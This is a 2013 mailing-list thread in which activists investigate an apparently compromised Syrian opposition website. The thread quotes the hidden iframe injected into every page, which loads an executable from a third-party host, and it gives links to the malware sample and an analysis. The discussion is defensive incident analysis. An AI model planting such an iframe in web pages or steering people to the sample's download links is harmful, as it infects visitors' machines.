Hello, I wrote a first summary on the case, I will try to keep it up to date with new data, https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/
ALl the best, KheOps Le 30/01/2013 00:00, SiNA Rabbani a écrit : > > Hi! > > I sent the malware to a couple of friends that have a setup ready. If > you want to try this it might be fun: > http://docs.cuckoosandbox.org/en/latest/ > > All the best, > SiNA > > > KheOps: >> Hey, >> >> Le 29/01/2013 23:34, SiNA Rabbani a écrit : >>> This is the malware: >>>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/ >> >> Yes, saw that too. >> >> However, I don't find any precise description of its behaviour. Like, >> what it does, if it opens any port, sends data to a C&C or whatever. >> >> I have downloaded it there: >> https://resources.telecomix.ceops.eu/material/malwares/ >> >> All the best, >> >>> >>> >>> --SiNA >>> >>> >>> >>> SiNA >>> >>> Rabbani: >>>> holly shit: >>> >>>> <iframe name="I1" width="10" height="10" >>>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"; >>> >>> >>> border="0" >>>> frameborder="0"> >>> >>> >>>> :/ if you are running windows don't even go there!!! >>> >>> >>>> Andrew Lewis: >>>>> I can get to this in 6 hours or so, maybe someone is willing to >>>>> jump on this before then? >>> >>>>> -Andrew >>> >>>>> On Jan 30, 2013, at 11:06 AM, KheOps <[email protected]> wrote: >>> >>>>>> Dear Libtech, >>>>>> >>>>>> We just saw that the website : http://www.syrian-martyrs.com >>>>>> is probably compromised. Every page of the website contains an >>>>>> iFrame which links to a .exe file which is detected as a virus >>>>>> by antivirus software: >>>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe >>>>>> >>>>>> >>>>>> >>> >>>>>> >>> The fact that the HTML code is present at the bottom of each page makes >>>>>> me think that the "index.php" page has been changed in a way >>>>>> that makes that iFrame appear on every page of the website, >>>>>> after the dynamic content. >>>>>> >>>>>> It also probably means that the attackers have some kind of >>>>>> access to the server. My guess would be going to a PHP shell, >>>>>> but I'm no expert in this. >>>>>> >>>>>> Any help, clue, investigation, would be very welcome :) >>>>>> >>>>>> Thank you, KheOps >>>>>> >>>>>> -- Unsubscribe, change to digest, or change password at: >>>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech >>>>> -- Unsubscribe, change to digest, or change password at: >>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech >>> >>> >>> >>> >>> >>> -- >>> Unsubscribe, change to digest, or change password at: >>> https://mailman.stanford.edu/mailman/listinfo/liberationtech >>> >> >> >> >> -- >> Unsubscribe, change to digest, or change password at: >> https://mailman.stanford.edu/mailman/listinfo/liberationtech >> > >
-- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
